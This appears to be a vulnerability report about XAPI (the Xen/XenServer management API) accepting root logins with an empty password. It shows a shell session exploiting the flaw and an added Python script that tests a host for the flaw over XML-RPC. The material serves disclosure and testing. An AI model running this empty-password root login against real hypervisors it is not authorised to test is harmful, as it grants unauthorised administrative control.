<email address hidden>:~$ id
uid=1000(xenadmin) gid=1000(xenadmin) groups=1000(xenadmin),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),111(lpadmin),112(sambashare)
xenadmin@act-sm-071:~$ xe host-is-in-emergency-mode -s localhost -u root -pw ""
false
As user xenadmin, I can execute "host-is-in-emergency-mode" against XAPI running on localhost as user root without having to supply root's password.
Effectively anyone can connect to XAPI as root without supplying a password and execute API commands.
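The xe CLI above is only a front end to XAPI's XML-RPC interface, so the same check can be made from any XML-RPC client. The following script is an added example and is not part of the bug report or of the XAPI project: it calls session.login_with_password with an empty password and reports whether a session was opened. It assumes the standard XenAPI response shape ({"Status": "Success", "Value": "OpaqueRef:..."} or {"Status": "Failure", "ErrorDescription": [...]}) and that XAPI on the host is reachable at http://localhost; the FakeProxy class is a constructed stand-in so the script can be run offline.

```python
import xmlrpc.client


def xapi_accepts_password(proxy, username="root", password=""):
    """Try to open a XAPI session for `username` with `password`.

    `proxy` is anything exposing the XenAPI XML-RPC `session` namespace:
    an xmlrpc.client.ServerProxy for a live host, or FakeProxy below.
    Returns True when XAPI opened a session (the session is then closed
    again so no root session is left lying around on the host).
    """
    resp = proxy.session.login_with_password(username, password)
    if resp.get("Status") != "Success":
        # Real XAPI returns ErrorDescription like
        # ["SESSION_AUTHENTICATION_FAILED", "root", "Authentication failure"]
        return False
    proxy.session.logout(resp["Value"])
    return True


def probe_host(url="http://localhost"):
    """Run the empty-password check against a live host (assumed URL)."""
    return xapi_accepts_password(xmlrpc.client.ServerProxy(url))


class _FakeSession:
    """Constructed stand-in for XAPI's `session` namespace (offline use)."""

    def __init__(self, root_password):
        self.root_password = root_password
        self.open_refs = []

    def login_with_password(self, username, password):
        if username != "root" or password != self.root_password:
            return {"Status": "Failure",
                    "ErrorDescription": ["SESSION_AUTHENTICATION_FAILED",
                                         username, "Authentication failure"]}
        ref = "OpaqueRef:constructed-%d" % len(self.open_refs)
        self.open_refs.append(ref)
        return {"Status": "Success", "Value": ref}

    def logout(self, ref):
        self.open_refs.remove(ref)
        return {"Status": "Success", "Value": ""}


class FakeProxy:
    """Constructed XML-RPC proxy: root_password="" models the reported host."""

    def __init__(self, root_password):
        self.session = _FakeSession(root_password)


if __name__ == "__main__":
    # Swap FakeProxy(...) for xmlrpc.client.ServerProxy("http://localhost")
    # (or call probe_host()) to test a real host.
    weak = FakeProxy(root_password="")
    print("empty root password accepted:", xapi_accepts_password(weak))
```

Run it unprivileged on the host as the report does; a True from probe_host() means the XML-RPC endpoint opens a root session with no password, independent of the xe binary.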